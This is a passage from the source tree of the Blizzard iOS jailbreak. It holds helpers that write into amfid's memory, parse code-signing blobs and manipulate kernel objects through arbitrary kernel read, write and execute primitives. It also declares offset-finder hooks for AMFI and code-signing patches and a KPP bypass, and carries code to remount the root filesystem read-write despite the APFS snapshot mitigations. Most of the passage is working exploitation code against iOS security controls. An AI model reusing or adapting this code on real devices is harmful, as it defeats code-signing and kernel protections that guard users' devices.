kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 1);
if (err != KERN_SUCCESS) {
printf("AMFI TOOLS: amfid write failed (0x%llx)\n", addr);
}
}
void AmfidWrite_32bits(uint64_t addr, uint32_t val) {
kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 4);
if (err != KERN_SUCCESS) {
printf("AMFI TOOLS: amfid write failed (0x%llx)\n", addr);
}
}
void AmfidWrite_64bits(uint64_t addr, uint64_t val) {
kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 8);
if (err != KERN_SUCCESS) {
printf("AMFI TOOLS: amfid write failed (0x%llx)\n", addr);
}
}
================================================
FILE: AMFI Utilities/amfid_tools.h
================================================
#import <stdio.h>
#import <unistd.h>
#import <sys/types.h>
#import <mach-o/loader.h>
#import <mach/error.h>
#import <errno.h>
#import <stdlib.h>
#import <dlfcn.h>
#import <mach/vm_map.h>
#import <Foundation/Foundation.h>
#import <CommonCrypto/CommonDigest.h>
#import "../AMFI Utilities/cs_blob.h"
static unsigned int hash_rank(const CodeDirectory *cd);
int get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]);
int parse_superblob(uint8_t *code_dir, uint8_t dst[CS_CDHASH_LEN]);
================================================
FILE: AMFI Utilities/amfid_tools.m
================================================
#import "amfid_tools.h"
#import "amfi_utils.h"
#import "amfid.h"
static unsigned int hash_rank(const CodeDirectory *cd){
uint32_t type = cd->hashType;
unsigned int n;
for (n = 0; n < sizeof(hashPriorities) / sizeof(hashPriorities[0]); ++n)
if (hashPriorities[n] == type){
return n + 1;
}
return 0;
}
int get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]) {
uint32_t realsize = ntohl(directory->length);
if (ntohl(directory->magic) != CSMAGIC_CODEDIRECTORY) {
printf("AMFI TOOLS: [get_hash] wtf, not CSMAGIC_CODEDIRECTORY?!\n");
return 1;
}
uint8_t out[CS_HASH_MAX_SIZE];
uint8_t hash_type = directory->hashType;
switch (hash_type) {
case CS_HASHTYPE_SHA1:
CC_SHA1(directory, realsize, out);
break;
case CS_HASHTYPE_SHA256:
case CS_HASHTYPE_SHA256_TRUNCATED:
CC_SHA256(directory, realsize, out);
break;
case CS_HASHTYPE_SHA384:
CC_SHA384(directory, realsize, out);
break;
default:
printf("AMFI TOOLS:[get_hash] Unknown hash type: 0x%x\n", hash_type);
return 2;
}
memcpy(dst, out, CS_CDHASH_LEN);
return 0;
}
int parse_superblob(uint8_t *code_dir, uint8_t dst[CS_CDHASH_LEN]) {
int ret = 1;
const CS_SuperBlob *sb = (const CS_SuperBlob *)code_dir;
uint8_t highest_cd_hash_rank = 0;
for (int n = 0; n < ntohl(sb->count); n++){
const CS_BlobIndex *blobIndex = &sb->index[n];
uint32_t type = ntohl(blobIndex->type);
uint32_t offset = ntohl(blobIndex->offset);
if (ntohl(sb->length) < offset) {
printf("AMFI TOOLS: offset of blob #%d overflows superblob length\n", n);
return 1;
}
const CodeDirectory *subBlob = (const CodeDirectory *)(code_dir + offset);
if (type == CSSLOT_CODEDIRECTORY || (type >= CSSLOT_ALTERNATE_CODEDIRECTORIES && type < CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT)) {
uint8_t rank = hash_rank(subBlob);
if (rank > highest_cd_hash_rank) {
ret = get_hash(subBlob, dst);
highest_cd_hash_rank = rank;
}
}
}
return ret;
}
================================================
FILE: AMFI Utilities/cs_blob.h
================================================
//from: xnu osfmk/kern/cs_blobs.h
#import <mach/mach.h>
typedef struct __attribute__((packed)) {
uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */
uint32_t length; /* total length of CodeDirectory blob */
uint32_t version; /* compatibility version */
uint32_t flags; /* setup and mode flags */
uint32_t hashOffset; /* offset of hash slot element at index zero */
uint32_t identOffset; /* offset of identifier string */
uint32_t nSpecialSlots; /* number of special hash slots */
uint32_t nCodeSlots; /* number of ordinary (code) hash slots */
uint32_t codeLimit; /* limit to main image signature range */
uint8_t hashSize; /* size of each hash in bytes */
uint8_t hashType; /* type of hash (cdHashType* constants) */
uint8_t platform; /* platform identifier; zero if not platform binary */
uint8_t pageSize; /* log2(page size in bytes); 0 => infinite */
uint32_t spare2; /* unused (must be zero) */
char end_earliest[0];
/* Version 0x20100 */
uint32_t scatterOffset; /* offset of optional scatter vector */
char end_withScatter[0];
/* Version 0x20200 */
uint32_t teamOffset; /* offset of optional team identifier */
char end_withTeam[0];
/* Version 0x20300 */
uint32_t spare3; /* unused (must be zero) */
uint64_t codeLimit64; /* limit to main image signature range, 64 bits */
char end_withCodeLimit64[0];
/* Version 0x20400 */
uint64_t execSegBase; /* offset of executable segment */
uint64_t execSegLimit; /* limit of executable segment */
uint64_t execSegFlags; /* executable segment flags */
char end_withExecSeg[0];
} CodeDirectory;
typedef struct __attribute__((packed)) {
uint32_t type; /* type of entry */
uint32_t offset; /* offset of entry */
} CS_BlobIndex;
typedef struct __attribute__((packed)) {
uint32_t magic; /* magic number */
uint32_t length; /* total length of SuperBlob */
uint32_t count; /* number of index entries following */
CS_BlobIndex index[]; /* (count) entries */
/* followed by Blobs in no particular order as indicated by offsets in index */
} CS_SuperBlob;
typedef struct __SC_Scatter {
uint32_t count; // number of pages; zero for sentinel (only)
uint32_t base; // first page number
uint64_t targetOffset; // offset in target
uint64_t spare; // reserved
} SC_Scatter;
/*
* Magic numbers used by Code Signing
*/
enum {
CSMAGIC_REQUIREMENT = 0xfade0c00, /* single Requirement blob */
CSMAGIC_REQUIREMENTS = 0xfade0c01, /* Requirements vector (internal requirements) */
CSMAGIC_CODEDIRECTORY = 0xfade0c02, /* CodeDirectory blob */
CSMAGIC_EMBEDDED_SIGNATURE = 0xfade0cc0, /* embedded form of signature data */
CSMAGIC_EMBEDDED_SIGNATURE_OLD = 0xfade0b02, /* XXX */
CSMAGIC_EMBEDDED_ENTITLEMENTS = 0xfade7171, /* embedded entitlements */
CSMAGIC_DETACHED_SIGNATURE = 0xfade0cc1, /* multi-arch collection of embedded signatures */
CSMAGIC_BLOBWRAPPER = 0xfade0b01, /* CMS Signature, among other things */
CS_SUPPORTSSCATTER = 0x20100,
CS_SUPPORTSTEAMID = 0x20200,
CS_SUPPORTSCODELIMIT64 = 0x20300,
CS_SUPPORTSEXECSEG = 0x20400,
CSSLOT_CODEDIRECTORY = 0, /* slot index for CodeDirectory */
CSSLOT_INFOSLOT = 1,
CSSLOT_REQUIREMENTS = 2,
CSSLOT_RESOURCEDIR = 3,
CSSLOT_APPLICATION = 4,
CSSLOT_ENTITLEMENTS = 5,
CSSLOT_ALTERNATE_CODEDIRECTORIES = 0x1000, /* first alternate CodeDirectory, if any */
CSSLOT_ALTERNATE_CODEDIRECTORY_MAX = 5, /* max number of alternate CD slots */
CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT = CSSLOT_ALTERNATE_CODEDIRECTORIES + CSSLOT_ALTERNATE_CODEDIRECTORY_MAX, /* one past the last */
CSSLOT_SIGNATURESLOT = 0x10000, /* CMS Signature */
CSTYPE_INDEX_REQUIREMENTS = 0x00000002, /* compat with amfi */
CSTYPE_INDEX_ENTITLEMENTS = 0x00000005, /* compat with amfi */
CS_HASHTYPE_SHA1 = 1,
CS_HASHTYPE_SHA256 = 2,
CS_HASHTYPE_SHA256_TRUNCATED = 3,
CS_HASHTYPE_SHA384 = 4,
CS_SHA1_LEN = 20,
CS_SHA256_LEN = 32,
CS_SHA256_TRUNCATED_LEN = 20,
CS_CDHASH_LEN = 20, /* always - larger hashes are truncated */
CS_HASH_MAX_SIZE = 48, /* max size of the hash we'll support */
/*
* Currently only to support Legacy VPN plugins,
* but intended to replace all the various platform code, dev code etc. bits.
*/
CS_SIGNER_TYPE_UNKNOWN = 0,
CS_SIGNER_TYPE_LEGACYVPN = 5,
};
/*
* Choose among different hash algorithms.
* Higher is better, 0 => don't use at all.
*/
static const uint32_t hashPriorities[] = {
CS_HASHTYPE_SHA1,
CS_HASHTYPE_SHA256_TRUNCATED,
CS_HASHTYPE_SHA256,
CS_HASHTYPE_SHA384,
};
typedef struct __SC_GenericBlob {
uint32_t magic; /* magic number */
uint32_t length; /* total length of blob */
char data[];
} CS_GenericBlob;
/*
* C form of a CodeDirectory.
*/
typedef struct __CodeDirectory {
uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */
uint32_t length; /* total length of CodeDirectory blob */
uint32_t version; /* compatibility version */
uint32_t flags; /* setup and mode flags */
uint32_t hashOffset; /* offset of hash slot element at index zero */
uint32_t identOffset; /* offset of identifier string */
uint32_t nSpecialSlots; /* number of special hash slots */
uint32_t nCodeSlots; /* number of ordinary (code) hash slots */
uint32_t codeLimit; /* limit to main image signature range */
uint8_t hashSize; /* size of each hash in bytes */
uint8_t hashType; /* type of hash (cdHashType* constants) */
uint8_t platform; /* platform identifier; zero if not platform binary */
uint8_t pageSize; /* log2(page size in bytes); 0 => infinite */
uint32_t spare2; /* unused (must be zero) */
char end_earliest[0];
/* Version 0x20100 */
uint32_t scatterOffset; /* offset of optional scatter vector */
char end_withScatter[0];
/* Version 0x20200 */
uint32_t teamOffset; /* offset of optional team identifier */
char end_withTeam[0];
/* Version 0x20300 */
uint32_t spare3; /* unused (must be zero) */
uint64_t codeLimit64; /* limit to main image signature range, 64 bits */
char end_withCodeLimit64[0];
/* Version 0x20400 */
uint64_t execSegBase; /* offset of executable segment */
uint64_t execSegLimit; /* limit of executable segment */
uint64_t execSegFlags; /* executable segment flags */
char end_withExecSeg[0];
/* followed by dynamic content as located by offset fields above */
} CS_CodeDirectory
__attribute__ ((aligned(1)));
#define CS_OPS_ENTITLEMENTS_BLOB 7 /* get entitlements blob */
int csops(pid_t pid, unsigned int ops, void *useraddr, size_t usersize);
struct cs_blob {
struct cs_blob *csb_next;
cpu_type_t csb_cpu_type;
unsigned int csb_flags;
off_t csb_base_offset; /* Offset of Mach-O binary in fat binary */
off_t csb_start_offset; /* Blob coverage area start, from csb_base_offset */
off_t csb_end_offset; /* Blob coverage area end, from csb_base_offset */
vm_size_t csb_mem_size;
vm_offset_t csb_mem_offset;
vm_address_t csb_mem_kaddr;
unsigned char csb_cdhash[CS_CDHASH_LEN];
const struct cs_hash *csb_hashtype;
vm_size_t csb_hash_pagesize; /* each hash entry represent this many bytes in the file */
vm_size_t csb_hash_pagemask;
vm_size_t csb_hash_pageshift;
vm_size_t csb_hash_firstlevel_pagesize; /* First hash this many bytes, then hash the hashes together */
const CS_CodeDirectory *csb_cd;
const char *csb_teamid;
const CS_GenericBlob *csb_entitlements_blob; /* raw blob, subrange of csb_mem_kaddr */
void * csb_entitlements; /* The entitlements as an OSDictionary */
unsigned int csb_signer_type;
unsigned int csb_reconstituted; // iOS 12 only
/* The following two will be replaced by the csb_signer_type. */
unsigned int csb_platform_binary:1;
unsigned int csb_platform_path:1;
#if __arm64e__
uint64_t csb_pmap_cs_entry;
#endif
};
typedef void (*cs_md_init)(void *ctx);
typedef void (*cs_md_update)(void *ctx, const void *data, size_t size);
typedef void (*cs_md_final)(void *hash, void *ctx);
struct cs_hash {
uint8_t cs_type; /* type code as per code signing */
size_t cs_size; /* size of effective hash (may be truncated) */
size_t cs_digest_size; /* size of native hash */
cs_md_init cs_init;
cs_md_update cs_update;
cs_md_final cs_final;
};
================================================
FILE: AMFI Utilities/osobject.c
================================================
#import <stdlib.h>
#import "../Kernel Utilities/kexecute.h"
#import "../Kernel Utilities/kernel_utils.h"
#import "../PatchFinder/patchfinder64.h"
#include "../Exploits/sock_port/kernel_memory.h"
#import "osobject.h"
static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
static uint32_t off_OSDictionary_Merge = sizeof(void*) * 0x23;
static uint32_t off_OSArray_Merge = sizeof(void*) * 0x1E;
static uint32_t off_OSArray_RemoveObject = sizeof(void*) * 0x20;
static uint32_t off_OSArray_GetObject = sizeof(void*) * 0x22;
static uint32_t off_OSObject_Release = sizeof(void*) * 0x05;
static uint32_t off_OSObject_GetRetainCount = sizeof(void*) * 0x03;
static uint32_t off_OSObject_Retain = sizeof(void*) * 0x04;
static uint32_t off_OSString_GetLength = sizeof(void*) * 0x11;
int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
size_t len = strlen(key) + 1;
uint64_t ks = kalloc(len);
kwrite(ks, key, len);
uint64_t vtab = rk64(dict);
uint64_t f = rk64(vtab + off_OSDictionary_SetObjectWithCharP);
int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);
kfree(ks, len);
return rv;
}
uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
size_t len = strlen(key) + 1;
uint64_t ks = kalloc(len);
kwrite(ks, key, len);
uint64_t vtab = rk64(dict);
uint64_t f = rk64(vtab + off_OSDictionary_GetObjectWithCharP);
int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);
kfree(ks, len);
return rv;
}
uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
uint64_t ret = _OSDictionary_GetItem(dict, key);
if (ret != 0) {
ret = ZmFixAddr(ret);
}
return ret;
}
int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
uint64_t vtab = rk64(dict);
uint64_t f = rk64(vtab + off_OSDictionary_Merge);
return (int) kexecute(f, dict, aDict, 0, 0, 0, 0, 0);
}
int OSArray_Merge(uint64_t array, uint64_t aArray) {
uint64_t vtab = rk64(array);
uint64_t f = rk64(vtab + off_OSArray_Merge);
return (int) kexecute(f, array, aArray, 0, 0, 0, 0, 0);
}
uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
uint64_t vtab = rk64(array);
uint64_t f = rk64(vtab + off_OSArray_GetObject);
return kexecute(f, array, idx, 0, 0, 0, 0, 0);
}
uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
uint64_t ret = _OSArray_GetObject(array, idx);
if (ret != 0){
ret = ZmFixAddr(ret);
}
return ret;
}
void OSArray_RemoveObject(uint64_t array, unsigned int idx){
uint64_t vtab = rk64(array);
uint64_t f = rk64(vtab + off_OSArray_RemoveObject);
(void)kexecute(f, array, idx, 0, 0, 0, 0, 0);
}
uint64_t _OSUnserializeXML(const char* buffer) {
size_t len = strlen(buffer) + 1;
uint64_t ks = kalloc(len);
kwrite(ks, buffer, len);
uint64_t errorptr = 0;
uint64_t rv = kexecute(Find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);
kfree(ks, len);
return rv;
}
uint64_t OSUnserializeXML(const char* buffer) {
uint64_t ret = _OSUnserializeXML(buffer);
if (ret != 0) {
ret = ZmFixAddr(ret);
}
return ret;
}
void OSObject_Release(uint64_t osobject) {
uint64_t vtab = rk64(osobject);
uint64_t f = rk64(vtab + off_OSObject_Release);
(void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
}
void OSObject_Retain(uint64_t osobject) {
uint64_t vtab = rk64(osobject);
uint64_t f = rk64(vtab + off_OSObject_Retain);
(void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
}
uint32_t OSObject_GetRetainCount(uint64_t osobject) {
uint64_t vtab = rk64(osobject);
uint64_t f = rk64(vtab + off_OSObject_GetRetainCount);
return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
}
unsigned int OSString_GetLength(uint64_t osstring){
uint64_t vtab = rk64(osstring);
uint64_t f = rk64(vtab + off_OSString_GetLength);
return (unsigned int)kexecute(f, osstring, 0, 0, 0, 0, 0, 0);
}
char *OSString_CopyString(uint64_t osstring){
unsigned int length = OSString_GetLength(osstring);
char *str = malloc(length + 1);
str[length] = 0;
kread(OSString_CStringPtr(osstring), str, length);
return str;
}
================================================
FILE: AMFI Utilities/osobject.h
================================================
#include "../Exploits/sock_port/kernel_memory.h"
#define OSDictionary_ItemCount(dict) rk32(dict+20)
#define OSDictionary_ItemBuffer(dict) rk64(dict+32)
#define OSDictionary_ItemKey(buffer, idx) rk64(buffer+16*idx)
#define OSDictionary_ItemValue(buffer, idx) rk64(buffer+16*idx+8)
#define OSString_CStringPtr(str) rk64(str + 0x10)
#define OSArray_ItemCount(arr) rk32(arr+0x14)
#define OSArray_ItemBuffer(arr) rk64(arr+32)
// see osobject.c for info
int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);
uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);
int OSDictionary_Merge(uint64_t dict, uint64_t aDict);
void OSArray_RemoveObject(uint64_t array, unsigned int idx);
uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);
int OSArray_Merge(uint64_t array, uint64_t aArray);
uint64_t OSUnserializeXML(const char* buffer);
void OSObject_Release(uint64_t osobject);
void OSObject_Retain(uint64_t osobject);
uint32_t OSObject_GetRetainCount(uint64_t osobject);
unsigned int OSString_GetLength(uint64_t osstring);
char *OSString_CopyString(uint64_t osstring);
================================================
FILE: APFS Utilities/IOKit.h
================================================
//
// IOKit.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 08/10/2020.
// Copyright © 2020 Blizzard Jailbreak. All rights reserved.
//
#ifndef IOKit_h
#define IOKit_h
#define IO_OBJECT_NULL (0)
#include <CoreFoundation/CoreFoundation.h>
typedef mach_port_t io_service_t;
typedef mach_port_t io_connect_t;
typedef mach_port_t io_object_t;
typedef io_object_t io_registry_entry_t;
typedef char io_name_t[128];
typedef char io_struct_inband_t[4096];
extern const mach_port_t kIOMasterPortDefault;
kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);
io_service_t IOServiceGetMatchingService(mach_port_t _masterPort, CFDictionaryRef matching);
CFMutableDictionaryRef IOServiceMatching(const char* name);
kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t* connect);
io_service_t IOServiceGetMatchingService(mach_port_t _masterPort, CFDictionaryRef matching);
CFMutableDictionaryRef IOServiceMatching(const char* name);
kern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties);
kern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t * size);
io_registry_entry_t IORegistryEntryFromPath(mach_port_t port, char *path);
kern_return_t IOObjectRelease(io_object_t object);
kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);
kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);
kern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);
#endif
/* IOKit_h */
================================================
FILE: APFS Utilities/liboffsetfinder64.hpp
================================================
//
// offsetfinder64.hpp
// offsetfinder64
//
// Created by tihmstar on 10.01.18.
// Copyright © 2018 tihmstar. All rights reserved.
// This is from here: https://github.com/tihmstar/liboffsetfinder64
//
#ifndef offsetfinder64_hpp
#define offsetfinder64_hpp
#include <string>
#include <stdint.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>
#include <mach-o/dyld_images.h>
#include <vector>
#include <stdlib.h>
typedef uint64_t offset_t;
namespace tihmstar {
class exception : public std::exception{
std::string _err;
int _code;
public:
exception(int code, std::string err) : _err(err), _code(code) {};
exception(std::string err) : _err(err), _code(0) {};
exception(int code) : _code(code) {};
const char *what(){return _err.c_str();}
int code(){return _code;}
};
namespace patchfinder64{
typedef uint8_t* loc_t;
class patch{
bool _slideme;
void(*_slidefunc)(class patch *patch, uint64_t slide);
public:
const loc_t _location;
const void *_patch;
const size_t _patchSize;
patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uint64_t slide) = NULL) : _location(location), _patchSize(patchSize), _slidefunc(slidefunc){
_patch = malloc(_patchSize);
memcpy((void*)_patch, patch, _patchSize);
_slideme = (_slidefunc) ? true : false;
}
patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy._patchSize){
_patch = malloc(_patchSize);
memcpy((void*)_patch, cpy._patch, _patchSize);
_slidefunc = cpy._slidefunc;
_slideme = cpy._slideme;
}
void slide(uint64_t slide){
if (!_slideme)
return;
printf("sliding with %p\n",(void*)slide);
_slidefunc(this,slide);
_slideme = false; //only slide once
}
~patch(){
free((void*)_patch);
}
};
}
class offsetfinder64 {
public:
struct text_t{
patchfinder64::loc_t map;
size_t size;
patchfinder64::loc_t base;
bool isExec;
};
private:
bool _freeKernel;
uint8_t *_kdata;
size_t _ksize;
offset_t _kslide;
patchfinder64::loc_t _kernel_entry;
std::vector<text_t> _segments;
struct symtab_command *__symtab;
void loadSegments(uint64_t slide);
__attribute__((always_inline)) struct symtab_command *getSymtab();
public:
offsetfinder64(const char *filename);
offsetfinder64(void* buf, size_t size, uint64_t base);
const void *kdata();
patchfinder64::loc_t find_entry();
const std::vector<text_t> &segments(){return _segments;};
patchfinder64::loc_t memmem(const void *little, size_t little_len);
patchfinder64::loc_t find_sym(const char *sym);
patchfinder64::loc_t find_syscall0();
uint64_t find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);
/*------------------------ v0rtex -------------------------- */
patchfinder64::loc_t find_zone_map();
patchfinder64::loc_t find_kernel_map();
patchfinder64::loc_t find_kernel_task();
patchfinder64::loc_t find_realhost();
patchfinder64::loc_t find_bzero();
patchfinder64::loc_t find_bcopy();
patchfinder64::loc_t find_copyout();
patchfinder64::loc_t find_copyin();
patchfinder64::loc_t find_ipc_port_alloc_special();
patchfinder64::loc_t find_ipc_kobject_set();
patchfinder64::loc_t find_ipc_port_make_send();
patchfinder64::loc_t find_chgproccnt();
patchfinder64::loc_t find_kauth_cred_ref();
patchfinder64::loc_t find_osserializer_serialize();
uint32_t find_vtab_get_external_trap_for_index();
uint32_t find_vtab_get_retain_count();
uint32_t find_iouserclient_ipc();
uint32_t find_ipc_space_is_task();
uint32_t find_proc_ucred();
uint32_t find_task_bsd_info();
uint32_t find_vm_map_hdr();
uint32_t find_task_itk_self();
uint32_t find_task_itk_registered();
uint32_t find_sizeof_task();
patchfinder64::loc_t find_rop_add_x0_x0_0x10();
patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();
/*------------------------ kernelpatches -------------------------- */
patchfinder64::patch find_i_can_has_debugger_patch_off();
patchfinder64::patch find_lwvm_patch_offsets();
patchfinder64::patch find_remount_patch_offset();
std::vector<patchfinder64::patch> find_nosuid_off();
patchfinder64::patch find_proc_enforce();
patchfinder64::patch find_amfi_patch_offsets();
patchfinder64::patch find_cs_enforcement_disable_amfi();
patchfinder64::patch find_amfi_substrate_patch();
// patchfinder64::patch find_sandbox_patch();
patchfinder64::loc_t find_sbops();
patchfinder64::patch find_nonceEnabler_patch();
/*------------------------ KPP bypass -------------------------- */
patchfinder64::loc_t find_gPhysBase();
patchfinder64::loc_t find_kernel_pmap();
patchfinder64::loc_t find_cpacr_write();
patchfinder64::loc_t find_idlesleep_str_loc();
patchfinder64::loc_t find_deepsleep_str_loc();
/*------------------------ Util -------------------------- */
patchfinder64::loc_t find_rootvnode();
~offsetfinder64();
};
using segment_t = std::vector<tihmstar::offsetfinder64::text_t>;
namespace patchfinder64{
loc_t find_literal_ref(segment_t segemts, offset_t kslide, loc_t pos);
}
}
#endif /* offsetfinder64_hpp */
================================================
FILE: APFS Utilities/offsetfinder.cpp
================================================
// Based on tihmstar's liboffsetfinder64 which is open source here:
// https://github.com/tihmstar/liboffsetfinder64
// Also Coolstar's implementation from Electra.
#include <stdint.h>
#include <stdio.h>
#include "rootfs_remount.h"
#include "liboffsetfinder64.hpp"
using namespace std;
using namespace tihmstar;
extern "C" uint64_t offset_vfs_context_current;
extern "C" uint64_t offset_vnode_lookup;
extern "C" uint64_t offset_vnode_put;
extern "C" bool offsetizeRN(uint64_t slide){
printf("Initializing OffsetFinder...\n");
offsetfinder64 fi("/System/Library/Caches/com.apple.kernelcaches/kernelcache");
try {
offset_vfs_context_current = (uint64_t)fi.find_sym("_vfs_context_current");
offset_vnode_lookup = (uint64_t)fi.find_sym("_vnode_lookup");
offset_vnode_put = (uint64_t)fi.find_sym("_vnode_put");
printf(" Offsetfinder: GOT: vfs_context_current: %p\n", (void *)offset_vfs_context_current);
printf(" Offsetfinder: GOT: vnode_lookup: %p\n", (void *)offset_vnode_lookup);
printf(" Offsetfinder: GOT: vnode_put: %p\n", (void *)offset_vnode_put);
offset_vfs_context_current += slide;
offset_vnode_lookup += slide;
offset_vnode_put += slide;
printf("OffsetFinder: The OffsetFinder ran successfully! Continuing...\n");
return true;
} catch (tihmstar::exception &e){
printf("OffsetFinder: The OffsetFinder has failed! Aborting... %d (%s)\n", e.code(), e.what());
return false;
} catch (std::exception &e){
printf("OffsetFinder: Could not properly initialize the OffsetFinder! %s\n", e.what());
return false;
}
}
================================================
FILE: APFS Utilities/rootfs_remount.h
================================================
//
// rootfs_remount.h
// electra1131
//
// Created by CoolStar on 6/7/18.
// Copyright © 2018 CoolStar. All rights reserved.
//
#ifndef rootfs_remount_h
#define rootfs_remount_h
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <copyfile.h>
int file_exists(const char *filename);
#define cp(to, from) copyfile(from, to, 0, COPYFILE_ALL)
#ifdef __cplusplus
extern "C" {
#endif
extern int shouldReboot;
int remountRootFS(void);
int unjailbreakBlizzard(void);
#ifdef __cplusplus
}
#endif
#endif /* rootfs_remount_h */
================================================
FILE: APFS Utilities/rootfs_remount.m
================================================
// Thanks to the Electra Team and Pwn20wnd!
/* APFS snapshot mitigation bypass bug by CoolStar, exploitation by Pwn20wnd */
/* Disables the new APFS snapshot mitigations introduced in iOS 11.3 */
#include <stdio.h>
#import <sys/snapshot.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <CoreFoundation/CoreFoundation.h>
#include "rootfs_remount.h"
#include "snapshot_tools.h"
#include <spawn.h>
#include "../Exploits/sock_port/kernel_memory.h"
#include "../Exploits/sock_port/exploit.h"
#include "../Kernel Utilities/kernel_utils.h"
#include "../PatchFinder/patchfinder64.h"
#include "../Kernel Utilities/kexecute.h"
#include "../Exploits/sock_port/offsetof.h"
#include "../Kernel Utilities/system_reboot.h"
#include "../Blizzard Jailbreak/BlizzardLog.h"
#include "../Blizzard Jailbreak/blizzardJailbreak.h"
#include "../APFS Utilities/snapshot_tools.h"
#define ROOTFSTESTFILE "/.BlizzardJB"
#define ROOTFSMNT "/var/rootfsmnt"
#define APPLESNAP "com.apple.os.update-"
#include "../Kernel Utilities/kernSymbolication.h"
uint64_t offset_vfs_context_current;
uint64_t offset_vnode_lookup;
uint64_t offset_vnode_put;
char *diskLocation = "/dev/disk0s1s1";
int shouldReboot = 0;
void dumpContentsOfDir(char *path);
// From http://newosxbook.com/src.jl?tree=&file=/xnu-1504.15.3/bsd/hfs/hfs_mount.h
struct hfs_mount_args {
char *fspec; /* block special device to mount */
uid_t hfs_uid; /* uid that owns hfs files (standard HFS only) */
gid_t hfs_gid; /* gid that owns hfs files (standard HFS only) */
mode_t hfs_mask; /* mask to be applied for hfs perms (standard HFS only) */
u_int32_t hfs_encoding; /* encoding for this volume (standard HFS only) */
struct timezone hfs_timezone; /* user time zone info (standard HFS only) */
int flags; /* mounting flags, see below */
int journal_tbuffer_size; /* size in bytes of the journal transaction buffer */
int journal_flags; /* flags to pass to journal_open/create */
int journal_disable; /* don't use journaling (potentially dangerous) */
};
int file_exists(const char *filename) {
int r = access(filename, F_OK);
return (r == 0);
}
static uint64_t _vnode_lookup = 0;
static uint64_t _vnode_put = 0;
static uint64_t _vfs_context_current = 0;
int vnode_lookup(const char *path, int flags, uint64_t *vnode, uint64_t vfs_context) {
size_t len = strlen(path) + 1;
uint64_t ptr = kalloc(8);
uint64_t ptr2 = kalloc(len);
kwrite(ptr2, path, len);
_vnode_lookup = find_symbol("_vnode_lookup", false);
if (!_vnode_lookup) _vnode_lookup = Find_vnode_lookup();
else _vnode_lookup += kernel_slide;
if (kexecute(_vnode_lookup, ptr2, flags, ptr, vfs_context, 0, 0, 0)) {
return -1;
}
*vnode = rk64(ptr);
kfree(ptr2, len);
kfree(ptr, 8);
return 0;
}
uint64_t get_vfs_context() {
_vfs_context_current = find_symbol("_vfs_context_current", false);
if (!_vfs_context_current) _vfs_context_current = Find_vfs_context_current();
else _vfs_context_current += kernel_slide;
return ZmFixAddr(kexecute(_vfs_context_current, 1, 0, 0, 0, 0, 0, 0));
}
int vnode_put(uint64_t vnode) {
_vnode_put = find_symbol("_vnode_put", false);
if (!_vnode_put) _vnode_put = Find_vnode_put();
else _vnode_put += kernel_slide;
return (int)kexecute(_vnode_put, vnode, 0, 0, 0, 0, 0, 0);
}
int mountDevAtPathAsRW(const char* devpath, const char* path) {
struct hfs_mount_args mntargs;
bzero(&mntargs, sizeof(struct hfs_mount_args));
mntargs.fspec = (char*)devpath;
mntargs.hfs_mask = 1;
gettimeofday(NULL, &mntargs.hfs_timezone);
int rvtmp = mount("apfs", path, 0, (void *)&mntargs);
perror("mount");
return rvtmp;
}
uint64_t getVnodeAtPath(const char *path) {
